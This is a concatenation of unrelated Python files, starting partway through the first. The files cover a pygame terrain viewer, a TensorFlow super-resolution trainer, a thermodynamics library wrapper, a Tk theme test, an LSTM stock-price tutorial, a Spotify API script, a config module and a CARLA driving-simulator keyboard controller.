return pygame.image.fromstring(im.tobytes(), im.size, im.mode)
def write_colour_to_screen(screen, array):
im = Image.fromarray(array)
screen.blit(pil_image_to_surface(im), (0,0))
def write_greyscale_to_screen(screen, greyscale_data):
scaled_data = np.copy(greyscale_data)
scaled_data = scaled_data - scaled_data.min()
scaled_data = scaled_data // (scaled_data.max()/255)
im = Image.fromarray(scaled_data).convert('RGB')
screen.blit(pil_image_to_surface(im), (0,0))
def calculate_scale_ratio(screen_size, image):
return min(
screen_dimension / original_dimension
for screen_dimension, original_dimension in zip(reversed(screen_size), image.size)
)
class VisSettings:
def __init__(
self,
screen_size: Tuple[int, int],
framerate: int = 165,
selection_line_width: int = 3,
selection_line_colour: Tuple[int, int, int] = (0, 204, 51),
):
print("Loading data...")
self.screen_size = screen_size
self.pil_colour_image = load_image_file_zipped(str(Path(__name__).absolute().parent.parent.joinpath("tasmania", "colour.tif")))
self.pil_small_colour_image = load_image_file_zipped(str(Path(__name__).absolute().parent.parent.joinpath("tasmania", "colour_small.png")))
self.full_size_dimensions = self.pil_colour_image.size
self.scale_ratio = calculate_scale_ratio(self.screen_size, self.pil_colour_image)
small_image_scale_ratio = calculate_scale_ratio(self.screen_size, self.pil_small_colour_image)
resized_dimensions = (small_image_scale_ratio * self.pil_small_colour_image.size[0], small_image_scale_ratio* self.pil_small_colour_image.size[1])
self.pil_small_colour_image.thumbnail(resized_dimensions, Image.ANTIALIAS)
self.pil_small_colour_image.crop((0, 0, self.screen_size[0], self.screen_size[1]))
self.pygame_colour_image = pil_image_to_surface(self.pil_small_colour_image)
self.framerate = framerate
self.selection_line_width = selection_line_width
self.selection_line_colour = selection_line_colour
print("Finished loading.")
def get_image_window(self, left, top, mode="colour"):
if mode=="colour":
path = str(Path(__name__).absolute().parent.parent.joinpath("tasmania", "colour.tif"))
else:
path = str(Path(__name__).absolute().parent.parent.joinpath("tasmania", "heights.tif"))
with rio.open(path) as rio_src:
w = rio.windows.Window(left, top, self.screen_size[0], self.screen_size[1])
if mode=="colour":
loaded_data = np.zeros((self.screen_size[1], self.screen_size[0], 3), "uint8")
loaded_data[..., 0] = rio_src.read(1, window=w)
loaded_data[..., 1] = rio_src.read(2, window=w)
loaded_data[..., 2] = rio_src.read(3, window=w)
im = Image.fromarray(loaded_data)
else:
loaded_data = rio_src.read(1, window=w)
if mode=="numpy":
return loaded_data
loaded_data = loaded_data - loaded_data.min()
loaded_data = loaded_data // (loaded_data.max()/255)
im = Image.fromarray(loaded_data).convert('RGB')
return pil_image_to_surface(im)
@dataclass
class VisState:
running: bool = True
within_transition: bool = True
resized_image_position: Tuple[int, int] = (0, 0)
rectangle_bounds: Tuple = None
scaled_location: Tuple = None
|
"""
Time Complexity: O(1)
Space Complexity: O(1)
"""
"""
Time Complexity: O(n)
Space Complexity: O(1)
"""
def sum_n_natural_numbers(n: int) -> int:
""""n: 1 + 2 + 3 + ... + n"""
result = 0
for i in range(1, n + 1):
result += i
return result
print(sum_n_natural_numbers(10))
print(sum_n_natural_numbers(3))
print(sum_n_natural_numbers(0))
print(sum_n_natural_numbers(5))
print(sum_n_natural_numbers(4))
|
import tensorflow as tf
import numpy as np
import math
import time
import os
import glob
import cv2
import datetime
import scipy as sp
from model_v2 import ESPCN
from utils import (
input_setup,
checkpoint_dir,
read_data,
checkimage,
imsave,
imread,
load_data,
preprocess,
modcrop
)
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_integer("epoch", 250, "Number of epoch")
flags.DEFINE_integer("steps_per_epoch", 250, "Steps per epoch")
flags.DEFINE_integer("image_size", 32, "The size of image input")
flags.DEFINE_integer("c_dim", 3, "The size of channel")
flags.DEFINE_boolean("is_train", True, "if training")
flags.DEFINE_integer("train_mode", 1, "0: Spatial Transformer 1: VESPSCN No MC\
2: VESPCN 3: Bicubic (No Training Required) 4: SRCNN \
5: Multi-Dir mode for testing mode 2 6: Multi-Dir mode \
for testing mode 1")
flags.DEFINE_integer("scale", 3,
"the size of scale factor for pre-processing input image")
flags.DEFINE_integer("stride", 100, "the size of stride")
flags.DEFINE_string("checkpoint_dir", "checkpoint",
"Name of checkpoint directory")
flags.DEFINE_float("learning_rate", 1e-4, "The learning rate")
flags.DEFINE_integer("batch_size", 8, "the size of batch")
flags.DEFINE_string("result_dir", "result", "Name of result directory")
flags.DEFINE_string("test_img", "", "test_img")
flags.DEFINE_boolean("load_existing_data", True,
"True iff existing hf data is loaded for training/testing")
flags.DEFINE_string("job_name", "", "ps/worker")
flags.DEFINE_integer("task_index", 0, "task index")
flags.DEFINE_string("ps_hosts", "", "ps-task hosts in cluster")
flags.DEFINE_string("worker_hosts", "", "worker-task hosts in cluster")
def prepare_data(config):
# Prepares data if load_existing_data is False
if not config.load_existing_data:
input_setup(config)
# Loads data from data_dir
print('Loading data...')
data_dir = checkpoint_dir(config)
input_, label_, paths_ = read_data(data_dir, config)
# Shuffles training data
print('Shuffling data...')
numData = np.arange(input_.shape[0])
np.random.shuffle(numData)
input_ = input_[numData]
label_ = label_[numData]
# Prepares frame sets for feeding into different spatial
# transformers if training mode is 2
if FLAGS.train_mode == 2:
print("Preparing frames sets for spatial transformers...")
curr_prev_imgs = input_[:, :, :, 0:(2 * config.c_dim)]
curr_next_imgs = np.concatenate((input_[:, :, :,
0:config.c_dim],
input_[:, :, :,
(2 * config.c_dim):
(3 * config.c_dim)]),
axis=3)
curr_prev_imgs = tf.cast(curr_prev_imgs, tf.float32)
curr_next_imgs = tf.cast(curr_next_imgs, tf.float32)
label_ = tf.cast(label_, tf.float32)
# Provides data in batch one at a time to tf.train.batch
input_queue = tf.train.slice_input_producer([curr_prev_imgs, curr_next_imgs, label_], shuffle=False)
x1, x2, y = tf.train.batch(input_queue, batch_size=FLAGS.batch_size)
return x1, x2, y
elif FLAGS.train_mode == 4:
# Upscales input data using bicubic interpolation
print('Upscaling training data using Bicubic Interpolation...')
input_new = []
for i in range(len(input_)):
input_new.append(sp.misc.imresize(input_[i],
(config.image_size * config.scale,
config.image_size * config.scale), interp='bicubic'))
input_ = np.array(input_new)
input_ = tf.cast(input_, tf.float32)
label_ = tf.cast(label_, tf.float32)
# Provides data in batch one at a time to tf.train.batch
input_queue = tf.train.slice_input_producer([input_, label_], shuffle=False)
x1, y = tf.train.batch(input_queue, batch_size=FLAGS.batch_size)
return x1, y
else:
input_ = tf.cast(input_, tf.float32)
label_ = tf.cast(label_, tf.float32)
# Provides data in batch one at a time to tf.train.batch
input_queue = tf.train.slice_input_producer([input_, label_], shuffle=False)
x1, y = tf.train.batch(input_queue, batch_size=FLAGS.batch_size)
return x1, y
def stop_fn(step_context):
step_context.request_stop()
return None
def run_train_epochs(cfg, espcn, server):
hooks = [tf.train.StopAtStepHook(last_step=(FLAGS.steps_per_epoch +
(len(server.enqueue_ops)*len(server.resource_dict['worker'])) + 1)),
tf.train.CheckpointSaverHook(checkpoint_dir=FLAGS.checkpoint_dir, save_steps=50, saver=tf.train.Saver())]
# hooks = []
# The MonitoredTrainingSession takes care of session initialization,
# restoring from a checkpoint, saving to a checkpoint, and closing when done
# or an error occurs.
# master="grpc://" + worker_hosts[FLAGS.task_index]
# if_chief: 制定task_index为0的任务为主任务,用于负责变量初始化、做checkpoint、保存summary和复原
# 定义计算服务器需要运行的操作。在所有的计算服务器中有一个是主计算服务器。
# 它除了负责计算反向传播的结果,它还负责输出日志和保存模型
print("chkpt dir: {}".format(FLAGS.checkpoint_dir))
print("hks: {}".format(hooks))
print("cgf: {}".format(cfg))
print("tsk indx T/F: {}".format(FLAGS.task_index == 0))
#os.chdir('C:\\Users\\XL\\Desktop\\spyn-poc')
#print("current dir: " + os.getcwd())
#checkpoint_path = os.path.join(os.getcwd(), r'\checkpoint')
#print("Checkpoint path: {}".format(checkpoint_path))
with tf.train.MonitoredTrainingSession(checkpoint_dir=None,
hooks=hooks,
master=server.target,
config=cfg,
is_chief=(server.task_index == 0)
) as sess:
while not sess.should_stop() and tf.train.global_step(sess, espcn.global_step) < FLAGS.steps_per_epoch:
espcn.train(FLAGS, sess)
if server.use_done_queues:
server.signal_done(sess)
sess.run_step_fn(stop_fn)
#print('Final step: {}'.format(tf.train.global_step(sess, espcn.global_step)))
def run_ps(server): # ===================================================================================== -> Checking if the flags are valid
server.join()
def run_worker(server):
# Checks if train mode is 3 and training is on
if FLAGS.train_mode == 3 and FLAGS.is_train:
print('Error: Bicubic Mode does not require training')
exit(1)
elif FLAGS.train_mode == 5 and FLAGS.is_train:
print('Error: Multi-Dir testing mode for Mode 2 does not require training')
exit(1)
elif FLAGS.train_mode == 6 and FLAGS.is_train:
print('Error: Multi-Dir testing mode for Mode 1 does not require training')
exit(1)
with tf.device(server.device):
print(server.device)
print(FLAGS.train_mode)
# Prepares data based on is_train and train_mode
DataList = []
if FLAGS.train_mode == 2:
xx1, xx2, yy = prepare_data(FLAGS)
DataList = [xx1, xx2, yy]
else:
xx1, yy = prepare_data(FLAGS)
DataList = [xx1, yy]
espcn = ESPCN(
image_size=FLAGS.image_size,
is_train=FLAGS.is_train,
train_mode=FLAGS.train_mode,
scale=FLAGS.scale,
c_dim=FLAGS.c_dim,
batch_size=FLAGS.batch_size,
load_existing_data=FLAGS.load_existing_data,
device=server.device,
learn_rate=FLAGS.learning_rate,
data_list=DataList)
if server.use_done_queues:
server.prepare_signal_ops()
# 通过设置log_device_placement选项来记录operations 和 Tensor 被指派到哪个设备上运行
config = tf.ConfigProto( # ================================================================================ -> Setting a configuration for the device
allow_soft_placement=True,
log_device_placement=False,
device_filters=["/job:ps", "/job:worker/task:%d" % FLAGS.task_index]
)
run_train_epochs(config, espcn, server)
|
# Support for python2
from __future__ import print_function
# Import ctypes
from ctypes import *
# Importing Numpy (math, arrays, etc...)
import numpy as np
# Import platform to detect OS
from sys import platform, exit
# Import os utils
from os import path
# Import thermo
from . import thermo
from . import cubic
c_len_type = thermo.c_len_type
class cpa(cubic.cubic):
"""
Interface to cubic plus association model
"""
def __init__(self):
"""
Initialize cubic specific function pointers
"""
# Load dll/so
super(cpa, self).__init__()
# Init methods
self.eoslibinit_init_cpa = getattr(self.tp, self.get_export_name("eoslibinit", "init_cpa"))
# Tuning methods
self.s_get_kij = getattr(self.tp, self.get_export_name("saft_interface", "cpa_get_kij"))
self.s_set_kij = getattr(self.tp, self.get_export_name("saft_interface", "cpa_set_kij"))
#################################
# Init
#################################
def init(self, comps, eos="SRK", mixing="vdW", alpha="Classic",
parameter_reference="Default"):
"""Initialize cubic plus association model in thermopack
Args:
comps (str): Comma separated list of component names
eos (str, optional): Cubic equation of state. Defaults to "SRK".
mixing (str, optional): Mixture model. Defaults to "vdW".
alpha (str, optional): Alpha model. Defaults to "Classic".
parameter_reference (str, optional): Which parameters to use?. Defaults to "Default".
"""
eos_c = c_char_p(eos.encode('ascii'))
eos_len = c_len_type(len(eos))
mixing_c = c_char_p(mixing.encode('ascii'))
mixing_len = c_len_type(len(mixing))
alpha_c = c_char_p(alpha.encode('ascii'))
alpha_len = c_len_type(len(alpha))
comp_string_c = c_char_p(comps.encode('ascii'))
comp_string_len = c_len_type(len(comps))
ref_string_c = c_char_p(parameter_reference.encode('ascii'))
ref_string_len = c_len_type(len(parameter_reference))
self.eoslibinit_init_cpa.argtypes = [c_char_p,
c_char_p,
c_char_p,
c_char_p,
c_char_p,
c_len_type,
c_len_type,
c_len_type,
c_len_type,
c_len_type]
self.eoslibinit_init_cpa.restype = None
self.eoslibinit_init_cpa(comp_string_c,
eos_c,
mixing_c,
alpha_c,
ref_string_c,
comp_string_len,
eos_len,
mixing_len,
alpha_len,
ref_string_len)
self.nc = max(len(comps.split(" ")),len(comps.split(",")))
def get_kij(self, c1, c2):
"""Get attractive energy interaction parameter
Args:
c1 (int): Component one
c2 (int): Component two
Returns:
kij (array_like): i-j interaction parameter (2 parameters)
"""
c1_c = c_int(c1)
c2_c = c_int(c2)
kij_c = (c_double * 2)(0.0)
self.s_get_kij.argtypes = [POINTER(c_int),
POINTER(c_int),
POINTER(c_double)]
self.s_get_kij.restype = None
self.s_get_kij(byref(c1_c),
byref(c2_c),
kij_c)
return np.array(kij_c)
def set_kij(self, c1, c2, kij):
"""Set attractive energy interaction parameter
Args:
c1 (int): Component one
c2 (int): Component two
kij (array_like): i-j interaction parameter (2 parameters)
"""
c1_c = c_int(c1)
c2_c = c_int(c2)
kij_c = (c_double * 2)(*kij)
self.s_set_kij.argtypes = [POINTER(c_int),
POINTER(c_int),
POINTER(c_double)]
self.s_set_kij.restype = None
self.s_set_kij(byref(c1_c),
byref(c2_c),
kij_c)
|
"""
Author: RedFantom
License: GNU GPLv3
Copyright (c) 2017-2018 RedFantom
"""
import sys
from unittest import TestCase
from ttkthemes import ThemedTk
from tkinter import ttk
def printf(string, end="\n"):
sys.__stdout__.write(string + end)
sys.__stdout__.flush()
class TestThemedWidgets(TestCase):
"""
Tkinter may crash if widgets are not configured properly in a theme.
Therefore, in addition to checking if all files for a theme exist
by loading it, this Test also tests every core ttk widget to see
if the widget can be successfully created with the theme data.
When Tkinter crashes, it keeps the Global Interpreter Lock in place,
so the program actually has to be terminated with SIGTERM.
Therefore, this test only executes on UNIX.
"""
WIDGETS = [
"Label",
"Treeview",
"Button",
"Frame",
"Notebook",
"Progressbar",
"Scrollbar",
"Scale",
"Entry",
"Combobox"
]
def setUp(self):
self.window = ThemedTk()
def test_widget_creation(self):
try:
import signal
except ImportError:
pass
if "signal" not in locals() or not hasattr(signal, "alarm"):
return
for theme in self.window.themes:
self.window.set_theme(theme)
for widget in self.WIDGETS:
window = ThemedTk(theme=theme)
signal.alarm(5)
printf("Testing {}: {}".format(theme, widget), end=" - ")
getattr(ttk, widget)(window).pack()
window.update()
window.destroy()
signal.alarm(0)
printf("SUCCESS")
def tearDown(self):
self.window.destroy()
|
# -*- coding: utf-8 -*-
"""
# Deep Learning - Recurrent Neural Networks
Implementation of a simple LSTM network that tries to estimate the google stock prices given a sequence of data.
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
"""## 1. Import your datasets train and test """
train = pd.read_csv('trainset.csv')
train.head()
test = pd.read_csv('testset.csv')
test.head()
"""## 2. Separate your open column and store it in a variable.
Training can only be done on numpy arrays, therefore we have to transform the dataframe into a numpy array.
"""
# Seperating the col and changing it to a numpy array and resizing it
training = train['Open'].to_numpy().reshape(-1, 1)
type(training)
"""## 3. Use a MaxMinScaler and scale your data to a range of 0-1."""
# import
from sklearn.preprocessing import MinMaxScaler
# initialize
scaler = MinMaxScaler(feature_range=(0,1))
# Scale the data
training_scaled = scaler.fit_transform(training)
training_scaled
"""## 4. Create empty arrays for x, y of train and test set.
We will use windows of 60 timestaps to predict the 61st sample. Use a for loop, that ranges to length of training or testing file. Every 60 sample, append to your training set.
Keep in mind that labels:
x_train.append(training_scaled[i-60:i, 0])
y_train.append(training_scaled[i,0])
"""
x_train = []
y_train = []
for i in range(60, len(training_scaled)):
x_train.append(training_scaled[i-60:i, 0])
y_train.append(training_scaled[i,0])
x_train, y_train = np.array(x_train), np.array(y_train)
"""## 5. reshape your data such that it has space for another set of features. """
x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))
x_train.shape
"""**Training and testing files should be ready** """
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Dropout
"""## 6. Create a regressor model that has the following structure.

"""
model = Sequential()
model.add(LSTM(units=50, return_sequences=True, input_shape=(60, 1)))
model.add(Dropout(0.2))
model.add(LSTM(units = 50, return_sequences = True))
model.add(Dropout(0.2))
model.add(LSTM(units = 50, return_sequences = True))
model.add(Dropout(0.2))
model.add(LSTM(units = 50))
model.add(Dropout(0.2))
model.add(Dense(units = 1))
"""## 7. Compile your model using the adam optimizer and set your losses for 'mean_squared_error'. and fit your data with 75 epochs."""
model.compile(optimizer = 'adam', loss = 'mean_squared_error')
print(model.summary())
model.fit(x_train, y_train, epochs = 75)
"""## 8. Concatenate your train['open'] and test['open'] with axis =0.
"""
testing = test['Open'].to_numpy().reshape(-1, 1)
concat_open = pd.concat((test['Open'], train['Open']), axis=0)
"""## 9. Make sure your inputs start from index 60. reshape them into a single column and apply the scaler transform. """
inputs = concat_open[1259 - 60:].to_numpy().reshape(-1, 1)
inputs = scaler.fit_transform(inputs)
inputs
"""## 10. Refer to step 4, if you have completed it for x_test move to step 11, else append your data in x_test in the same way. """
x_test = []
for i in range(60, len(inputs)):
x_test.append(inputs[i-60:i, 0])
"""## 11. Convert to a numpy array and reshape similar to step 5."""
x_test = np.array(x_test)
x_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))
x_test.shape
"""## 12. Predict your results and plot them against the real values."""
pred = model.predict(x_test)
# undo the transformation by inverse-transforming since we need it in the original form
pred = scaler.inverse_transform(pred)
plt.plot(testing, label='Stock Price')
plt.plot(pred, label='Prediction')
plt.xlabel('Time')
plt.ylabel('Stock price')
plt.legend()
plt.show()
|
from .subcmd import SubCmd
class ResumeCmd(SubCmd):
def add_parser(self, subparser):
self.parser = subparser.add_parser('resume', help='Resume a previously stopped job')
self.parser.add_argument(
'id',
help='ID of crawler job'
)
def execute(self, args):
raise NotImplementedError()
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`refex.parsed_file`
------------------------
"""
# No portable raw unicode literal exists without unicode_literals.
# see https://stackoverflow.com/questions/33027281
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import re
from typing import Iterable, Mapping, Optional
import asttokens
import attr
import cached_property
@attr.s(frozen=True, eq=True, order=False)
class ParsedFile(object):
"""A wrapper for a file after preprocessing.
May be subclassed.
The base class contains common metadata and does not in fact represent the
result of any parsing. Individual subclasses may contain detailed data about
the structure of a file. (See, for example,
:class:`refex.python.matcher.PythonParsedFile`)
Attributes:
text: The unparsed file contents.
path: The path to the file.
pragmas: The pragmas for this file, in file order.
line_numbers: A cache for line number <-> codepoint offset conversion.
"""
text = attr.ib(type=str)
path = attr.ib(type=str)
pragmas = attr.ib(type=Iterable["Pragma"])
@cached_property.cached_property
def line_numbers(self):
return asttokens.LineNumbers(self.text)
# Matches a trailing pragma in a piece of text in an re.search.
_PRAGMA_RE = re.compile(
r"""
# Match only at the boundary (like \b) for words-including-dashes.
# We'd use lookbehind, but this isn't a fixed-width pattern.
(?:[^-\w]|\A)
(?P<tag>[-\w]+)\s*
:
\s*
(?P<data>
[-\w]+\s*=\s*[-\w.]+\s* # key=value
(?:,\s* [-\w]+ \s* = \s* [-\w.]+ \s*)*
)
(?:,\s*)? # trailing comma allowed, to try to be maximally permissive.
\Z
""", re.VERBOSE)
@attr.s(frozen=True)
class Pragma(object):
"""A pragma / directive for Refex to alter how it handles files.
Attributes:
tag: The pragma namespace. This should be ``"refex"`` unless the pragma is
actually parsed from a comment that targets another system (e.g. pylint.)
data: The pragma payload, a set of key-value pairs.
start: The start (codepoint offset) of the pragma in the file. Inclusive.
end: The end (codepoint offset) of the pragma in the file. Exclusive.
"""
tag = attr.ib(type=str)
data = attr.ib(type=Mapping[str, str])
start = attr.ib(type=int)
end = attr.ib(type=int)
@classmethod
def from_text(cls, text, start, end) -> Optional["Pragma"]:
"""Parses pragmas from the standard format: ``tag: key=value, ...``.
For example, ``refex: disable=foo`` becomes
``Pragma(tag=refex, data={"disable": "foo"}, ...)``
The pragma must end the string, although arbitrary leading text (usually an
explanation for why the pragma was used) is allowed.
Args:
text: The candidate pragma text.
start: The start offset for the pragma.
end: The end offset for the pragma.
Returns:
A :class:`Pragma` if text[start:end] parses as a pragma, otherwise
``None``.
"""
m = _PRAGMA_RE.search(text)
if m is None:
return None
data = {}
for declaration in m.group('data').split(','):
key, _, value = declaration.partition('=')
data[key.strip()] = value.strip()
return cls(tag=m.group('tag'), data=data, start=start, end=end)
|
''''
Given an array of integers nums and an integer k, determine whether there are two distinct indices i and j in the array where nums[i] = nums[j] and the absolute difference between i and j is less than or equal to k.
Example
For nums = [0, 1, 2, 3, 5, 2] and k = 3, the output should be
containsCloseNums(nums, k) = true.
There are two 2s in nums, and the absolute difference between their positions is exactly 3.
For nums = [0, 1, 2, 3, 5, 2] and k = 2, the output should be
containsCloseNums(nums, k) = false.
The absolute difference between the positions of the two 2s is 3, which is more than k.
Input/Output
[execution time limit] 4 seconds (py3)
[input] array.integer nums
Guaranteed constraints:
0 ≤ nums.length ≤ 55000,
-231 - 1 ≤ nums[i] ≤ 231 - 1.
[input] integer k
Guaranteed constraints:
0 ≤ k ≤ 35000.
[output] boolean
''''
def containsCloseNums(nums, k):
d = dict()
for i in range(len(nums)):
if nums[i] in d:
if abs(d[nums[i]] - i) <= k:
return True
d[nums[i]] = i
return False
|
import spotipy
from spotipy.oauth2 import SpotifyOAuth
import os
from secret import *
os.environ["SPOTIPY_CLIENT_ID"] = clientId
os.environ["SPOTIPY_CLIENT_SECRET"] = clientSecret
os.environ["SPOTIPY_REDIRECT_URI"] = "https://open.spotify.com/"
scope = "user-library-read"
username = '1146603936'
auth_user = SpotifyOAuth(scope=scope, username=username)
auth_user.get_cached_token()
sp = spotipy.Spotify(auth_manager=auth_user)
results = sp.current_user_saved_tracks()
for idx, item in enumerate(results['items']):
track = item['track']
print(idx, track['artists'][0]['name'], " – ", track['name'])
|
import os
import storage
def _readConfig(f):
try:
return storage.json.load(f)
except IOError:
return []
dir_path = os.path.dirname(os.path.realpath(__file__))
defaultConfig = _readConfig(dir_path + '/config_default.json')
userConfig = _readConfig(dir_path + '/config.json')
overrides = {}
# File name of main data store
def log():
return _getConfigValue('log') + ".yaml"
# File name of txt for exporting
def export():
return _getConfigValue('export')
# Repository to sync worktimes to
def syncRepoUrl():
return _getConfigValue('sync_repo_url')
def syncRepoBranch():
return _getConfigValue('sync_repo_branch')
def autoSync():
return _getConfigValue("sync_automatically")
# Print notices to macOS notification center as well as shell
def notifications():
return _getConfigValue('notifications')
def hoursPerDay():
return _getConfigValue('hours_per_day')
# Send an iMessage to a contact when ending a timer
def imessage():
return _getConfigValue('imessage')
def imessage_address():
return _getConfigValue('imessage_address')
def imessage_text():
return _getConfigValue('imessage_text')
# TextBar mode (http://richsomerfield.com/apps/textbar/)
def textbar():
return _getConfigValue('textbar')
def default_category():
return _getConfigValue('default_category')
def categories():
return _getConfigValue('categories')
def log_path():
return dir_path + "/" + log()
def export_path():
return dir_path + '/' + export()
def xlsx_template():
return _getConfigValue('xlsx_template')
def ods_template():
return _getConfigValue('ods_template')
def _getConfigValue(s):
if s in overrides:
return overrides[s]
if s in userConfig:
return userConfig[s]
elif s in defaultConfig:
return defaultConfig[s]
else:
raise ValueError('Config value %s missing' % s)
|
"""
Welcome to CARLA manual control.
Use ARROWS or WASD keys for control.
W : throttle
S : brake
A/D : steer left/right
Q : toggle reverse
Space : hand-brake
P : toggle autopilot
M : toggle manual transmission
,/. : gear up/down
L : toggle next light type
SHIFT + L : toggle high beam
Z/X : toggle right/left blinker
I : toggle interior light
TAB : change sensor position
[1-9] : change to sensor [1-9]
G : toggle radar visualization
R : toggle recording images to disk
CTRL + R : toggle recording of simulation (replacing any previous)
F1 : toggle HUD
ESC : quit
"""
import pygame
from pygame.locals import KMOD_CTRL
from pygame.locals import KMOD_SHIFT
from pygame.locals import K_0
from pygame.locals import K_9
from pygame.locals import K_COMMA
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_LEFT
from pygame.locals import K_PERIOD
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_TAB
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_g
from pygame.locals import K_d
from pygame.locals import K_h
from pygame.locals import K_m
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_w
from pygame.locals import K_l
from pygame.locals import K_i
from pygame.locals import K_z
from pygame.locals import K_x
from typing import Tuple
import logging
import carla
from ROAR_Sim.configurations.configuration import Configuration as CarlaConfig
class KeyboardControl(object):
"""Class that handles keyboard input."""
def __init__(self, world, carla_setting: CarlaConfig):
self.logger = logging.getLogger(__name__)
if carla_setting.print_keyboard_hint:
print(__doc__)
print()
if isinstance(world.player, carla.Vehicle):
self._control = carla.VehicleControl()
self._lights = carla.VehicleLightState.NONE
world.player.set_light_state(self._lights)
elif isinstance(world.player, carla.Walker):
self._control = carla.WalkerControl()
self._rotation = world.player.get_transform().rotation
else:
raise NotImplementedError("Actor type not supported")
self._steer_cache = 0.0
self.logger.debug("Keyboard Control initiated")
def parse_events(self, client, world, clock) -> \
Tuple[bool, carla.VehicleControl]:
"""
Parse keyboard press.
:param client: carla.Client
:param world: carla.Client
:param clock: pygame clock
:return:
bool - True if should continue, aka no exit key was pressed
control - carla.VehicleControl
"""
if isinstance(self._control, carla.VehicleControl):
current_lights = self._lights
for event in pygame.event.get():
if event.type == pygame.QUIT:
return False, None
elif event.type == pygame.KEYUP:
if self._is_quit_shortcut(event.key):
return False, None
elif event.key == K_F1:
world.hud.toggle_info()
elif event.key == K_h or (
event.key == K_SLASH and pygame.key.get_mods() & KMOD_SHIFT
):
world.hud.help.toggle()
elif event.key == K_TAB:
world.camera_manager.toggle_camera()
elif event.key == K_g:
world.toggle_radar()
elif event.key > K_0 and event.key <= K_9:
world.camera_manager.set_sensor(event.key - 1 - K_0)
elif event.key == K_r and not (pygame.key.get_mods() & KMOD_CTRL):
world.camera_manager.toggle_recording()
elif event.key == K_r:
if world.recording_enabled:
client.stop_recorder()
world.recording_enabled = False
world.hud.notification("Recorder is OFF")
else:
client.start_recorder("manual_recording.rec")
world.recording_enabled = True
world.hud.notification("Recorder is ON")
if isinstance(self._control, carla.VehicleControl):
if event.key == K_q:
self._control.gear = 1 if self._control.reverse else -1
elif event.key == K_m:
self._control.manual_gear_shift = (
not self._control.manual_gear_shift
)
self._control.gear = world.player.get_control().gear
world.hud.notification(
"%s Transmission"
% (
"Manual"
if self._control.manual_gear_shift
else "Automatic"
)
)
elif self._control.manual_gear_shift and event.key == K_COMMA:
self._control.gear = max(-1, self._control.gear - 1)
elif self._control.manual_gear_shift and event.key == K_PERIOD:
self._control.gear = self._control.gear + 1
elif event.key == K_l and pygame.key.get_mods() & KMOD_CTRL:
current_lights ^= carla.VehicleLightState.Special1
elif event.key == K_l and pygame.key.get_mods() & KMOD_SHIFT:
current_lights ^= carla.VehicleLightState.HighBeam
elif event.key == K_l:
# Use 'L' key to switch between lights:
# closed -> position -> low beam -> fog
if not self._lights & carla.VehicleLightState.Position:
world.hud.notification("Position lights")
current_lights |= carla.VehicleLightState.Position
else:
world.hud.notification("Low beam lights")
current_lights |= carla.VehicleLightState.LowBeam
if self._lights & carla.VehicleLightState.LowBeam:
world.hud.notification("Fog lights")
current_lights |= carla.VehicleLightState.Fog
if self._lights & carla.VehicleLightState.Fog:
world.hud.notification("Lights off")
current_lights ^= carla.VehicleLightState.Position
current_lights ^= carla.VehicleLightState.LowBeam
current_lights ^= carla.VehicleLightState.Fog
elif event.key == K_i:
current_lights ^= carla.VehicleLightState.Interior
elif event.key == K_z:
current_lights ^= carla.VehicleLightState.LeftBlinker
elif event.key == K_x:
current_lights ^= carla.VehicleLightState.RightBlinker
if isinstance(self._control, carla.VehicleControl):
self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
self._control.reverse = self._control.gear < 0
# Set automatic control-related vehicle lights
if self._control.brake:
current_lights |= carla.VehicleLightState.Brake
else: # Remove the Brake flag
current_lights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Brake
if self._control.reverse:
current_lights |= carla.VehicleLightState.Reverse
else: # Remove the Reverse flag
current_lights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Reverse
if current_lights != self._lights: # Change the light state only if necessary
self._lights = current_lights
world.player.set_light_state(carla.VehicleLightState(self._lights))
elif isinstance(self._control, carla.WalkerControl):
self._parse_walker_keys(pygame.key.get_pressed(), clock.get_time(), world)
return True, self._control
# world.player.apply_control(self._control)
# self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
# return True, self._control
def _parse_vehicle_keys(self, keys, milliseconds):
if keys[K_UP] or keys[K_w]:
self._control.throttle = min(self._control.throttle + 0.01, 1)
else:
self._control.throttle = 0.0
if keys[K_DOWN] or keys[K_s]:
self._control.brake = min(self._control.brake + 0.2, 1)
else:
self._control.brake = 0
steer_increment = 5e-4 * milliseconds
if keys[K_LEFT] or keys[K_a]:
if self._steer_cache > 0:
self._steer_cache = 0
else:
self._steer_cache -= steer_increment
elif keys[K_RIGHT] or keys[K_d]:
if self._steer_cache < 0:
self._steer_cache = 0
else:
self._steer_cache += steer_increment
else:
self._steer_cache = 0.0
self._steer_cache = min(0.7, max(-0.7, self._steer_cache))
self._control.steer = round(self._steer_cache, 1)
self._control.hand_brake = keys[K_SPACE]
def _parse_walker_keys(self, keys, milliseconds, world):
self._control.speed = 0.0
if keys[K_DOWN] or keys[K_s]:
self._control.speed = 0.0
if keys[K_LEFT] or keys[K_a]:
self._control.speed = 0.01
self._rotation.yaw -= 0.08 * milliseconds
if keys[K_RIGHT] or keys[K_d]:
self._control.speed = 0.01
self._rotation.yaw += 0.08 * milliseconds
if keys[K_UP] or keys[K_w]:
self._control.speed = (
world.player_max_speed_fast
if pygame.key.get_mods() & KMOD_SHIFT
else world.player_max_speed
)
